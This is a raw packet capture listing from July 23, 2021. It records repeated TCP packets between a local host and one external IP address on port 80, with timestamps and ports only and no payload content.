Jul 23, 2021 22:24:24.865318060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865346909 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865384102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865386963 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865418911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865449905 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865454912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865483999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865518093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865521908 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865556002 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865586996 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865597010 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865618944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865649939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865658998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865683079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865716934 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865725040 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865755081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865787029 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865813971 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865819931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865854979 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865888119 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865902901 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865920067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865937948 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.865953922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865988016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.865998983 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866028070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866061926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866070986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866094112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866131067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866132021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866164923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866198063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866226912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866231918 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866266012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866267920 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866303921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866338968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866342068 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866374016 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866409063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866409063 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866442919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866477013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866481066 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866512060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866547108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866565943 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866584063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866621017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866625071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866655111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866691113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866693974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866724014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866758108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866771936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866791964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866826057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866849899 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866863012 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866897106 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866899014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866933107 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.866965055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.866967916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867005110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867038965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867041111 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867072105 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867106915 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867142916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867168903 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867208958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867244005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867275953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867280006 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867305040 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867311954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867345095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867346048 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867376089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867400885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867412090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867424011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867451906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867465973 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867480993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867537975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867549896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867573977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867610931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867626905 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867639065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867660999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867686033 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867717028 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867724895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867741108 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867749929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867773056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867795944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867805004 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867819071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867835999 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867842913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867865086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867877007 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867888927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867917061 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867939949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867942095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867955923 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.867964983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.867989063 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868011951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868015051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868033886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868051052 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868057013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868079901 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868092060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868108034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868133068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868140936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868155003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868177891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868192911 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868201971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868225098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868235111 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868247032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868269920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868285894 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868297100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868323088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868331909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868345022 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868367910 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868376017 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868390083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868416071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868442059 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868449926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868484974 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868488073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868521929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868547916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868556976 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868570089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868592978 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868616104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868618011 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868638992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868649960 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868660927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868685007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868694067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.868711948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868737936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.868757010 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.880359888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880393028 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880414009 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880423069 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.880435944 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880455971 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880465984 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.880481958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880501986 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.880511045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880537987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880568027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880573034 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.880614042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.880630970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893042088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893102884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893121004 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893135071 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893162966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893174887 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893191099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893219948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893224001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893246889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893275023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893284082 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893302917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893337965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893337965 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893368959 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893397093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893399954 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893424034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893455982 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893461943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893491983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893531084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893568993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893604040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893635988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893646002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893662930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893693924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893703938 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893728018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893760920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893770933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.893790007 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893817902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.893826962 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.894990921 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895055056 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895132065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895179987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895212889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895232916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895240068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895268917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895277977 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895303965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895334005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895337105 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895360947 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895390034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895401001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895423889 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895451069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895462036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895478964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895507097 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895528078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895540953 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895570993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895592928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895598888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895637035 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895639896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895665884 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895694017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895721912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895721912 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895750999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895773888 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895785093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895814896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895826101 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895842075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895869017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895879030 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895895958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895921946 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895929098 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.895948887 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895992041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.895997047 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.896018028 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.896045923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.896054029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.896074057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.896117926 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901582956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901618004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901637077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901653051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901664972 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901665926 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901676893 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901690006 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901701927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901715994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901736021 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901736975 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901752949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901762962 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901767969 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901782036 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901783943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901798010 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901803970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901813984 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901854992 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901895046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901911020 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901926041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901936054 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901946068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901963949 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901977062 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.901983976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.901995897 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902012110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902019024 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902029991 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902046919 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902060032 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902061939 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902091026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902091026 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902106047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902117014 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902121067 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902134895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902144909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902147055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902160883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902177095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902190924 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902204990 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902214050 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902235985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902237892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902260065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902267933 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902281046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902302027 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902318954 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902321100 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902342081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902349949 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902363062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902385950 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902398109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.902409077 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.902437925 CEST	80	49750	45.144.225.135	192.168.2.4
